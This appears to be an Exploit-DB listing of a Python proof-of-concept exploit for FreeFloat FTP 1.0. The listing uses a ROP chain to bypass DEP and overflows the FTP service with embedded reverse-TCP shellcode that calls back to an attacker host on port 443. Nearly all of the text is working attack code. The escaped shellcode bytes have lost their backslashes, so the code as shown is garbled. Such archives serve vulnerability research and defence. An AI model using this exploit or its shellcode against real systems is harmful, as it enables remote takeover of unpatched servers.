[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FreeFloat FTP 1.0 - DEP Bypass with ROP
# Published : 2013-04-10
# Author :
# Previous Title : BigAnt Server 2.97 - DDNF Username Buffer Overflow
# Next Title : Linksys WRT54GL apply.cgi Command Execution


#!usr/bin/python
# Exploit title: FreeFloat ftp 1.0 DEP bypass with ROP 
#
# Exploit Author: negux 
#
# POC: http://www.exploit-db.com/exploits/24479/
# Tested on : Windows XP SP 3 Spanish
import socket,struct

# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.117 LPORT=443 R | msfencode -a x86 -b 'x00x0ax0bx27x36xcexc1x04x14x3ax44xe0x42xa9x0d'

shellcode = (
"x6ax4fx59xd9xeexd9x74x24xf4x5bx81x73x13xb7" +
"x2dxadxa3x83xebxfcxe2xf4x4bxc5x24xa3xb7x2d" +
"xcdx2ax52x1cx7fxc7x3cx7fx9dx28xe5x21x26xf1" +
"xa3xa6xdfx8bxb8x9axe7x85x86xd2x9cx63x1bx11" +
"xccxdfxb5x01x8dx62x78x20xacx64x55xddxffxf4" +
"x3cx7fxbdx28xf5x11xacx73x3cx6dxd5x26x77x59" +
"xe7xa2x67x7dx26xebxafxa6xf5x83xb6xfex4ex9f" +
"xfexa6x99x28xb6xfbx9cx5cx86xedx01x62x78x20" +
"xacx64x8fxcdxd8x57xb4x50x55x98xcax09xd8x41" +
"xefxa6xf5x87xb6xfexcbx28xbbx66x26xfbxabx2c" +
"x7ex28xb3xa6xacx73x3ex69x89x87xecx76xccxfa" +
"xedx7cx52x43xefx72xf7x28xa5xc6x2bxfexdfx1e" +
"x9fxa3xb7x45xdaxd0x85x72xf9xcbxfbx5ax8bxa4" +
"x48xf8x15x33xb6x2dxadx8ax73x79xfdxcbx9exad" +
"xc6xa3x48xf8xfdxf3xe7x7dxedxf3xf7x7dxc5x49" +
"xb8xf2x4dx5cx62xa4x6axcbx77x85xacxd6xdfx2f" +
"xadxa2x0cxa4x4bxc9xa7x7bxfaxcbx2ex88xd9xc2" +
"x48xf8xc5xc0xdax49xadx2ax54x7axfaxf4x86xdb" +
"xc7xb1xeex7bx4fx5exd1xeaxe9x87x8bx2cxacx2e" +
"xf3x09xbdx65xb7x69xf9xf3xe1x7bxfbxe5xe1x63" +
"xfbxf5xe4x7bxc5xdax7bx12x2bx5cx62xa4x4dxed" +
"xe1x6bx52x93xdfx25x2axbexd7xd2x78x18x47x98" +
"x0fxf5xdfx8bx38x1ex2axd2x78x9fxb1x51xa7x23" +
"x4cxcdxd8xa6x0cx6axbexd1xd8x47xadxf0x48xf8" +
"xadxa3")

## ROP 

rop =  struct.pack("<I",0x77bf362c) # POP EBX / RET
rop += struct.pack("<I",0x41414141) # junk
rop += struct.pack("<I",0x41414141) # junk
rop += struct.pack("<I",0xFFFFFFFF) # 00000000
rop += struct.pack("<I",0x7e810b7e) # INC EBX / RET

rop += struct.pack("<I",0x77bebb36) # POP EBP / RET
rop += struct.pack("<I",0x7C862144) # SetProcessDEPPolicy

rop += struct.pack("<I",0x77bf3b47) # POP EDI / RET
rop += struct.pack("<I",0x77be1110) # RET
rop += struct.pack("<I",0x77bf1891) # POP ESI / RET
rop += struct.pack("<I",0x77be2091) # RET

rop += struct.pack("<I",0x7e6ea62b) # PUSHAD / RET

####

### Exploit-DB Note ROP for Windows SP3 English SP3
rop2 =  struct.pack("<I",0x7C9F880B) # POP EBX / RETN 7C9F880B
rop2 += struct.pack("<I",0x41414141) # junk
rop2 += struct.pack("<I",0x41414141) # junk
rop2 += struct.pack("<I",0xFFFFFFFF) # 00000000
rop2 += struct.pack("<I",0x77540FB2) # INC EBX / RETN 77540FB2
 
rop2 += struct.pack("<I",0x7C9FD315) # POP EBP / RETN 7C9FD315
rop2 += struct.pack("<I",0x7C862144) # SetProcessDEPPolicy
 
rop2 += struct.pack("<I",0x7C9FCEF2) # POP EDI / RETN 7C9FCEF2
rop2 += struct.pack("<I",0x7C9FCEF3) # RET 7C9FCEF3
rop2 += struct.pack("<I",0x7C9F9CA2) # POP ESI / RETN  7C9F9CA2
rop2 += struct.pack("<I",0x7C9FCEF3) # RETN
 
rop2 += struct.pack("<I",0x7E423AD9) # PUSHAD / RETN 7E423AD9
###


target = "192.168.1.71"
port = 21
junk = "x41"*251
nops = "x90"*100

exploit = junk + rop + nops + shellcode

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect = sock.connect((target,port))
	sock.recv(1024)
	sock.send(exploit +"rn")
	sock.close()
except:
	print "Error to connect... "